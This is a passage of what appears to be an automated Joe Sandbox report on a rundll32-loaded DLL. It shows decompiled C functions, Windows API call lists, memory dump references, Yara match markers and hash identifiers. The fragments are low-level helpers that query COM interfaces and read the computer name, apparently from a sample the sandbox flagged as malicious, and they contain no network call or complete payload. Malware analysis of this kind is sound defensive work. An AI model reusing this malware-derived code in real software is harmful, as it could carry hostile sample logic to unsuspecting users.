                                                          							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                                                          							_t57 = _t57 + 0xc;
                                                          							E036D6C2C(_t55);
                                                          						}
                                                          					}
                                                          					memset(_a4, 0, _t53);
                                                          					E036D6C2C(_a4);
                                                          				}
                                                          				return _v16;
                                                          			}


                                                          APIs
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,036D4493,?), ref: 036D25AB
                                                          • memset.NTDLL ref: 036D2621
                                                          • memset.NTDLL ref: 036D2635
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 1529149438-0
                                                          • Opcode ID: 636be9677d405b6d1053cc7be2accc299b10d0ae4f42e243f2389036f962fd0a
                                                          • Instruction ID: 1fb9f2282f0d9a7546c0b66eb43fe9bcf23f9dc93d9abeabc2afd2c4b149df45
                                                          • Opcode Fuzzy Hash: 636be9677d405b6d1053cc7be2accc299b10d0ae4f42e243f2389036f962fd0a
                                                          • Instruction Fuzzy Hash: FD211B75E00218ABDB11EFA5DC50FAEBBB9EF09640F044469F904EA254E735DA118BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062771B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771D3
                                                            • Part of subcall function 062771B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771DE
                                                            • Part of subcall function 062771B4: _wcsupr.NTDLL ref: 062771EB
                                                            • Part of subcall function 062771B4: lstrlenW.KERNEL32(00000000), ref: 062771F3
                                                          • ResumeThread.KERNEL32(00000004,?,0627F2F7,?), ref: 06285D8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                          • String ID: v
                                                          • API String ID: 3646851950-1801730948
                                                          • Opcode ID: 19eb1090002df9f0980517a6a96c6d6116346ba88717aa27804375770ab7cd44
                                                          • Instruction ID: d11abe8f0a84ac06bcd440eab2b9dc454d07e06b5b58615482d21021617cad87
                                                          • Opcode Fuzzy Hash: 19eb1090002df9f0980517a6a96c6d6116346ba88717aa27804375770ab7cd44
                                                          • Instruction Fuzzy Hash: 65D09E38635312AEEBE62B21DD09F167D925F81B54F008464FD95604A0C7768460DA55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E036D1F7A(intOrPtr _a4) {
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				intOrPtr _v40;
                                                          				void* _v46;
                                                          				short _v48;
                                                          				intOrPtr _t49;
                                                          				void* _t51;
                                                          				intOrPtr* _t53;
                                                          				intOrPtr _t56;
                                                          				void* _t58;
                                                          				intOrPtr* _t59;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr* _t67;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				short _t73;
                                                          				intOrPtr* _t74;
                                                          				intOrPtr _t77;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t82;
                                                          				char* _t98;
                                                          				intOrPtr _t100;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          				intOrPtr _t112;
                                                          
                                                          				_v48 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosw");
                                                          				_t49 =  *0x36da348; // 0x228d5a8
                                                          				_t4 = _t49 + 0x36db448; // 0x59689f0
                                                          				_t82 = 0;
                                                          				_t5 = _t49 + 0x36db438; // 0x9ba05972
                                                          				_t51 =  *0x36da170(_t5, 0, 4, _t4,  &_v20); // executed
                                                          				_t106 = _t51;
                                                          				if(_t106 >= 0) {
                                                          					_t53 = _v20;
                                                          					_push( &_v12);
                                                          					_push(1);
                                                          					_push( &_v32);
                                                          					_push(8);
                                                          					_t98 =  &_v48;
                                                          					_push(_t98);
                                                          					_push(_t98);
                                                          					_push(_t53); // executed
                                                          					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                                          						_t56 =  *0x36da348; // 0x228d5a8
                                                          						_t30 = _t56 + 0x36db428; // 0x59689d0
                                                          						_t31 = _t56 + 0x36db458; // 0x4c96be40
                                                          						_t58 =  *0x36da10c(_v12, _t31, _t30,  &_v24); // executed
                                                          						_t106 = _t58;
                                                          						_t59 = _v12;
                                                          						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                          						goto L11;
                                                          					} else {
                                                          						_t71 = _v20;
                                                          						_v16 = 0;
                                                          						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                                          						if(_t106 >= 0) {
                                                          							_t112 = _v16;
                                                          							if(_t112 == 0) {
                                                          								_t106 = 0x80004005;
                                                          								goto L11;
                                                          							} else {
                                                          								if(_t112 <= 0) {
                                                          									L11:
                                                          									if(_t106 >= 0) {
                                                          										goto L12;
                                                          									}
                                                          								} else {
                                                          									do {
                                                          										_t73 = 3;
                                                          										_v48 = _t73;
                                                          										_t74 = _v20;
                                                          										_v40 = _t82;
                                                          										_t108 = _t108 - 0x10;
                                                          										asm("movsd");
                                                          										asm("movsd");
                                                          										asm("movsd");
                                                          										asm("movsd");
                                                          										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                                                          										if(_t106 < 0) {
                                                          											goto L7;
                                                          										} else {
                                                          											_t77 =  *0x36da348; // 0x228d5a8
                                                          											_t23 = _t77 + 0x36db428; // 0x59689d0
                                                          											_t24 = _t77 + 0x36db458; // 0x4c96be40
                                                          											_t106 =  *0x36da10c(_v12, _t24, _t23,  &_v24);
                                                          											_t80 = _v12;
                                                          											 *((intOrPtr*)( *_t80 + 8))(_t80);
                                                          											if(_t106 >= 0) {
                                                          												L12:
                                                          												_t63 = _v24;
                                                          												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                                          												if(_t106 >= 0) {
                                                          													_t100 =  *0x36da348; // 0x228d5a8
                                                          													_t67 = _v28;
                                                          													_t40 = _t100 + 0x36db418; // 0x214e3
                                                          													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                                          													_t69 = _v28;
                                                          													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                          												}
                                                          												_t65 = _v24;
                                                          												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          											} else {
                                                          												goto L7;
                                                          											}
                                                          										}
                                                          										goto L15;
                                                          										L7:
                                                          										_t82 = _t82 + 1;
                                                          									} while (_t82 < _v16);
                                                          									goto L11;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					L15:
                                                          					_t61 = _v20;
                                                          					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                          				}
                                                          				return _t106;
                                                          			}

                                                          APIs
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,059689D0,036D3F35,?,?,?,?,?,?,?,?,?,?,?,036D3F35), ref: 036D2047
                                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,059689D0,036D3F35,?,?,?,?,?,?,?,036D3F35,00000000,00000000,00000000,006D0063), ref: 036D2085
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryServiceUnknown_
                                                          • String ID:
                                                          • API String ID: 2042360610-0
                                                          • Opcode ID: cb463c5b023098faa827a41e862d0b5f5e3eb703d94e87e1e7af32f43a50df73
                                                          • Instruction ID: aae0725a1a61d81447932dd5d8884d3cdf0020824cbb928de9930cba8de3cbcd
                                                          • Opcode Fuzzy Hash: cb463c5b023098faa827a41e862d0b5f5e3eb703d94e87e1e7af32f43a50df73
                                                          • Instruction Fuzzy Hash: C9513D75D00219AFCB40DFE8C898DEEB7B9FF48710B058999E905EB254D671AD42CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E036D46CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                          				void* _v8;
                                                          				void* __esi;
                                                          				intOrPtr* _t35;
                                                          				void* _t40;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr* _t57;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t68;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          
                                                          				_t55 = _a4;
                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                          				_a4 = 0;
                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                          				if(_t76 < 0) {
                                                          					L18:
                                                          					return _t76;
                                                          				}
                                                          				_t40 = E036D74FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                          				_t76 = _t40;
                                                          				if(_t76 >= 0) {
                                                          					_t61 = _a28;
                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                          						_t52 = _v8;
                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                          					}
                                                          					if(_t76 >= 0) {
                                                          						_t43 =  *_t55;
                                                          						_t68 =  *0x36da348; // 0x228d5a8
                                                          						_t20 = _t68 + 0x36db1fc; // 0x740053
                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                          						if(_t76 >= 0) {
                                                          							_t76 = E036D65D1(_a4);
                                                          							if(_t76 >= 0) {
                                                          								_t65 = _a28;
                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                          									_t50 = _a4;
                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t45 = _a4;
                                                          						if(_t45 != 0) {
                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                          						}
                                                          						_t57 = __imp__#6;
                                                          						if(_a20 != 0) {
                                                          							 *_t57(_a20);
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							 *_t57(_a12);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t41 = _v8;
                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                          				goto L18;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 036D74FE: SysAllocString.OLEAUT32(80000002), ref: 036D755B
                                                            • Part of subcall function 036D74FE: SysFreeString.OLEAUT32(00000000), ref: 036D75C1
                                                          • SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                          • SysFreeString.OLEAUT32(036D3520), ref: 036D47B4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 02256085d477798fd2a0dca411f78b54a159988356b0d6aaf7e434c435bad2ed
                                                          • Instruction ID: bf5d430e2e104c2475cec6dd459f51500f374e2d370e41828c1713d179d21b94
                                                          • Opcode Fuzzy Hash: 02256085d477798fd2a0dca411f78b54a159988356b0d6aaf7e434c435bad2ed
                                                          • Instruction Fuzzy Hash: A9315E75900118AFCB12EF95CC88C9BBBBAFFCA7407244658F9059B214DB31DD51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E036D5634(intOrPtr* __eax, intOrPtr _a4) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr* _t22;
                                                          				void* _t23;
                                                          				intOrPtr* _t24;
                                                          				intOrPtr* _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr* _t30;
                                                          				void* _t31;
                                                          				intOrPtr* _t32;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t45;
                                                          				intOrPtr _t48;
                                                          				void* _t51;
                                                          
                                                          				_push( &_v16);
                                                          				_t42 =  *0x36da348; // 0x228d5a8
                                                          				_t2 = _t42 + 0x36db468; // 0x20400
                                                          				_push(0);
                                                          				_push(__eax);
                                                          				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                                          				if(_t51 >= 0) {
                                                          					_t22 = _v16;
                                                          					_t45 =  *0x36da348; // 0x228d5a8
                                                          					_t6 = _t45 + 0x36db488; // 0xe7a1af80
                                                          					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                                          					_t51 = _t23;
                                                          					if(_t51 >= 0) {
                                                          						_t26 = _v12;
                                                          						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                                          						if(_t51 >= 0) {
                                                          							_t48 =  *0x36da348; // 0x228d5a8
                                                          							_t30 = _v8;
                                                          							_t12 = _t48 + 0x36db478; // 0xa4c6892c
                                                          							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                                          							_t51 = _t31;
                                                          							_t32 = _v8;
                                                          							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          						}
                                                          						_t28 = _v12;
                                                          						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                          					}
                                                          					_t24 = _v16;
                                                          					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                          				}
                                                          				return _t51;
                                                          			}

                                                          APIs
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 036D5671
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 036D56A2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Interface_ProxyQueryUnknown_
                                                          • String ID:
                                                          • API String ID: 2522245112-0
                                                          • Opcode ID: c52b5fd45c9c54f9a251df77a5f6185ad850221f2b1255e3af498e772f0f8c72
                                                          • Instruction ID: f8557bbbf2dbbe5f1ab1b6b38f61ae4b578e9df592a96030b1556ce295ac2232
                                                          • Opcode Fuzzy Hash: c52b5fd45c9c54f9a251df77a5f6185ad850221f2b1255e3af498e772f0f8c72
                                                          • Instruction Fuzzy Hash: F9214F79E01619EFCB00DBA4C888D9AF779EF89704B158688ED05DB368D771ED41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 06283253
                                                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0628329A
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                          • String ID:
                                                          • API String ID: 552344955-0
                                                          • Opcode ID: ece6722e07f66b124d85ad1dd337011fcfbbc1d012a4eb0bec60a746f24ee886
                                                          • Instruction ID: 9155cd8375adc174bbd9b79e385e68c124d708ea09a1e762dc5b4bec0fecca8d
                                                          • Opcode Fuzzy Hash: ece6722e07f66b124d85ad1dd337011fcfbbc1d012a4eb0bec60a746f24ee886
                                                          • Instruction Fuzzy Hash: 2911E971D21209AFDB51EFE9CC44B9EBBB8EF85694F204059EC0097280DB78CE01CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,062802F2,69B25F44,?,?,00000000), ref: 062893AD
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,062802F2), ref: 0628940E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystem
                                                          • String ID:
                                                          • API String ID: 892271797-0
                                                          • Opcode ID: fae5a3452f997d2baed1a700cde86a0cb0276da70b43d4c40fff99b4da3c36fc
                                                          • Instruction ID: c2975e0e273b3519ad397d43fa0a38971c88a94831ab8d3d749b24ac1210492f
                                                          • Opcode Fuzzy Hash: fae5a3452f997d2baed1a700cde86a0cb0276da70b43d4c40fff99b4da3c36fc
                                                          • Instruction Fuzzy Hash: E6111CB5D11309FFCF51EBA8ED48ADEB7FDAB48205F004062AA15E2180D774AB84DF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 036D1267
                                                            • Part of subcall function 036D46CB: SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 036D12B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$CreateDestroyFreeString
                                                          • String ID:
                                                          • API String ID: 3098518882-0
                                                          • Opcode ID: be63457552665e15f3fbc59b458b4c8fad93fc0067a346d27d2e222dc8af0463
                                                          • Instruction ID: a71c70a3ccfc6db297eaf5e45e502246e55227e05eab558588799affb3e8d73a
                                                          • Opcode Fuzzy Hash: be63457552665e15f3fbc59b458b4c8fad93fc0067a346d27d2e222dc8af0463
                                                          • Instruction Fuzzy Hash: A2118235D00209BFDB01DFA4D8049EEBBB9EF04310F008015EA00E7264E7719A258B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(036D7283), ref: 036D150A
                                                            • Part of subcall function 036D46CB: SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D154B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 418dde13675f028928c205945cf8f4e83eff9ea8cb98f56d4090608c993a4290
                                                          • Instruction ID: d3fddb3a9e03a00c42b4e5e557662c87bf474aca3dc6228f838c9ff6b1944c66
                                                          • Opcode Fuzzy Hash: 418dde13675f028928c205945cf8f4e83eff9ea8cb98f56d4090608c993a4290
                                                          • Instruction Fuzzy Hash: EE01A276901109BFDF41DFA8E904DAF7BB8EF48710B014025F909E7224D7708A25CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E036D22D7(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E036D6D63(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E036D6C2C(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}
                                                          0x036d22dc
                                                          0x036d22e7
                                                          0x036d22e9
                                                          0x036d22ef
                                                          0x036d22f1
                                                          0x036d22f6
                                                          0x036d22ff
                                                          0x036d2303
                                                          0x036d230c
                                                          0x036d2310
                                                          0x036d231f
                                                          0x036d2312
                                                          0x036d2313
                                                          0x036d2318
                                                          0x036d2318
                                                          0x036d2310
                                                          0x036d2303
                                                          0x036d2328

                                                          APIs
                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,036D57B5,00000000,00000000,?,75BCC740,036D57B5), ref: 036D22EF
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,036D57B5,036D57B6,?,75BCC740,036D57B5), ref: 036D230C
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 3e61f335841c12c0a691ae62bbdca64c8dbeab569002ebe09dee9764bb7e9f03
                                                          • Instruction ID: 4b1198434ebc09a468bb3a1539ff6fa453182677c847294fa062bae4b917bc2e
                                                          • Opcode Fuzzy Hash: 3e61f335841c12c0a691ae62bbdca64c8dbeab569002ebe09dee9764bb7e9f03
                                                          • Instruction Fuzzy Hash: E0F0B476E00209BAE721D6A9DD10FAF77FCDFC5600F160059E900D7204EAB0DA0186B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D78BF(WCHAR* _a4) {
                                                          				void* __edi;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t14;
                                                          				void* _t16;
                                                          				void* _t18;
                                                          				WCHAR* _t20;
                                                          
                                                          				_t20 = E036D6D63(lstrlenW(_a4) + _t7 + 0x5c);
                                                          				if(_t20 == 0) {
                                                          					_t18 = 8;
                                                          				} else {
                                                          					_t11 =  *0x36da348; // 0x228d5a8
                                                          					_t5 = _t11 + 0x36dba70; // 0x43002f
                                                          					wsprintfW(_t20, _t5, 5, _a4);
                                                          					_t14 =  *0x36da348; // 0x228d5a8
                                                          					_t6 = _t14 + 0x36db900; // 0x6d0063
                                                          					_t16 = E036D7928(0, _t6, _t20, 0); // executed
                                                          					_t18 = _t16;
                                                          					E036D6C2C(_t20);
                                                          				}
                                                          				return _t18;
                                                          			}
                                                          0x036d78d5
                                                          0x036d78d9
                                                          0x036d7919
                                                          0x036d78db
                                                          0x036d78df
                                                          0x036d78e6
                                                          0x036d78ee
                                                          0x036d78f4
                                                          0x036d78ff
                                                          0x036d7908
                                                          0x036d790e
                                                          0x036d7910
                                                          0x036d7910
                                                          0x036d791e

                                                          APIs
                                                          • lstrlenW.KERNEL32(76CDF710,00000000,?,036D71A6,00000000,?,76CDF710,00000000,76CDF730), ref: 036D78C5
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • wsprintfW.USER32 ref: 036D78EE
                                                            • Part of subcall function 036D7928: memset.NTDLL ref: 036D794B
                                                            • Part of subcall function 036D7928: GetLastError.KERNEL32 ref: 036D7997
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                                          • String ID:
                                                          • API String ID: 1672627171-0
                                                          • Opcode ID: 184b248a5b484d71520e1239d07beba45047934858d07e77a5212415a6d5a4d3
                                                          • Instruction ID: 2249cc6dbbc775b5b5861d4032363bcc6179dddad6af993cb8333de3d0af0d95
                                                          • Opcode Fuzzy Hash: 184b248a5b484d71520e1239d07beba45047934858d07e77a5212415a6d5a4d3
                                                          • Instruction Fuzzy Hash: 46F0B437D06614ABC320EBA4EC04E5A7B9DEF88711F06441AF905DF259C771992287A5
